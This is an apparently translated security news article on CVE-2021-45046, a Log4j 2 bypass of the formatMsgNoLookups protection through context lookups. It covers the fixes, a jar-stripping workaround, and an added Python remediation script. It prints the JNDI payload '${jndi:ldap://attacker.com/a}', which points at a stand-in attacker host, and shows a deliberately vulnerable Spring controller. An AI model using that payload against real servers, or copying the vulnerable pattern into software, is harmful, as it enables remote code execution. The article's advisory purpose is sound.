New attack variant for Log4j 2 that bypasses the added protection

Another vulnerability has been identified in the JNDI lookup implementation of the Log4j 2 library (CVE-2021-45046). It is present despite the fixes added in release 2.15 and is not affected by the "log4j2.formatMsgNoLookups" protective setting. The issue is most dangerous for older Log4j 2 versions that were protected with the formatMsgNoLookups flag, because it allows that protection against the earlier vulnerability (Log4Shell, CVE-2021-44228) to be bypassed, leading to execution of attacker-supplied code on the server. For users of version 2.15, exploitation is limited to crashing the application by exhausting available resources.

The problem only affects deployments whose logging configuration uses Context Lookups, such as ${ctx:loginId}, or Thread Context Map (MDC) patterns, such as %X, %mdc and %MDC. Exploitation comes down to getting data that contains a JNDI expression written to the log through a context lookup or MDC pattern in an application whose configuration uses these elements to define the log output format.

Researchers from LunaSec noted that for Log4j versions below 2.15 this vulnerability can serve as a new vector for the Log4Shell attack leading to code execution, provided that ThreadContext expressions incorporating external data are used in the output pattern, regardless of whether the "formatMsgNoLookups" protective flag or the "%m{nolookups}" pattern is enabled.


The bypass rests on the fact that instead of substituting "${jndi:ldap://attacker.com/a}" directly into the message, the expression arrives through the value of an intermediate variable referenced in the rules that format log output. For example, if the context lookup ${ctx:apiversion} is used when writing to the log, the attack can be carried out by placing the string "${jndi:ldap://attacker.com/a}" into the value stored in the apiversion variable. Example of vulnerable code (a log4j2.properties pattern and a Spring controller):

    appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    import org.apache.logging.log4j.ThreadContext;
    import org.springframework.web.bind.annotation.GetMapping;
    import org.springframework.web.bind.annotation.RequestHeader;
    import org.springframework.web.bind.annotation.RestController;

    @RestController
    public class ApiController {
        private static final Logger logger = LogManager.getLogger(ApiController.class);

        @GetMapping("/")
        public String index(@RequestHeader("X-Api-Version") String apiVersion) {
            // The attacker-controlled "X-Api-Version" HTTP header is copied into ThreadContext
            ThreadContext.put("apiversion", apiVersion);
            // When this line is logged, the external apiversion value is expanded through the
            // ${ctx:apiversion} substitution in the pattern, regardless of formatMsgNoLookups
            logger.info("Received request for API version");
            return "Hello, world!";
        }
    }

In Log4j 2.15 the vulnerability can be used for a DoS attack: values passed into ThreadContext can cause an endless loop (unbounded recursion) when the output pattern is expanded.


Updates 2.16 and 2.12.2 have been released to close the vulnerability. In the Log4j 2.16 branch, in addition to the fixes from version 2.15 and the restriction of JNDI LDAP requests to "localhost", JNDI functionality is disabled by default and support for lookup substitutions in messages has been removed. As a security workaround, it is recommended to remove the JndiLookup class from the classpath (for example, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class").
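The following Python script, added here as an example (not from the article or the Log4j project), automates the workaround above: it walks a directory tree, reports which jars still contain JndiLookup.class, and rewrites them without that entry, which is what the zip -d command does. The demo builds a throwaway jar with the same entry names as log4j-core (constructed, with placeholder class bodies) so it runs offline.

```python
"""Find jars that still ship JndiLookup.class and strip it (example, not project code)."""
import os
import shutil
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def find_jars(root):
    """Yield every *.jar under root (jars nested inside WAR/EAR files are not opened)."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".jar"):
                yield os.path.join(dirpath, name)


def has_jndi_lookup(jar_path):
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_CLASS in jar.namelist()


def strip_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class, same effect as `zip -q -d`."""
    tmp_fd, tmp_path = tempfile.mkstemp(suffix=".jar", dir=os.path.dirname(jar_path) or ".")
    os.close(tmp_fd)
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp_path, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_CLASS:
                continue
            dst.writestr(info, src.read(info.filename))   # keeps per-entry compression
    shutil.copymode(jar_path, tmp_path)                    # keep the original permissions
    os.replace(tmp_path, jar_path)                         # atomic swap on the same filesystem


def remediate(root, dry_run=True):
    """Return {jar_path: 'vulnerable' | 'stripped' | 'clean'}."""
    report = {}
    for jar in find_jars(root):
        if not has_jndi_lookup(jar):
            report[jar] = "clean"
        elif dry_run:
            report[jar] = "vulnerable"
        else:
            strip_jndi_lookup(jar)
            report[jar] = "stripped"
    return report


def make_sample_jar(path):
    """Constructed stand-in for log4j-core: only the entry names matter here."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        jar.writestr("org/apache/logging/log4j/core/lookup/ContextMapLookup.class",
                     b"\xca\xfe\xba\xbe")


def demo():
    """Build a sample tree, report, strip, re-check. Returns (before, after, remaining)."""
    workdir = tempfile.mkdtemp()
    jar = os.path.join(workdir, "lib", "log4j-core-2.14.1.jar")
    os.makedirs(os.path.dirname(jar))
    make_sample_jar(jar)
    before = remediate(workdir, dry_run=True)[jar]
    remediate(workdir, dry_run=False)
    after = remediate(workdir, dry_run=True)[jar]
    with zipfile.ZipFile(jar) as z:
        remaining = z.namelist()
    shutil.rmtree(workdir)
    return before, after, remaining


if __name__ == "__main__":
    print(demo())
```

Jars nested inside WAR/EAR archives and shaded "fat" jars that relocate the package are not covered, and stripping the class is a stopgap: the actual fix is the upgrade to 2.16 or 2.12.2 described above.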

You can track the availability of fixes on the distributions' package pages (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) and from Java platform vendors (GitHub, Docker, Oracle, VMware, Broadcom and Amazon/AWS, Juniper, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, etc.).

Source: opennet.ru
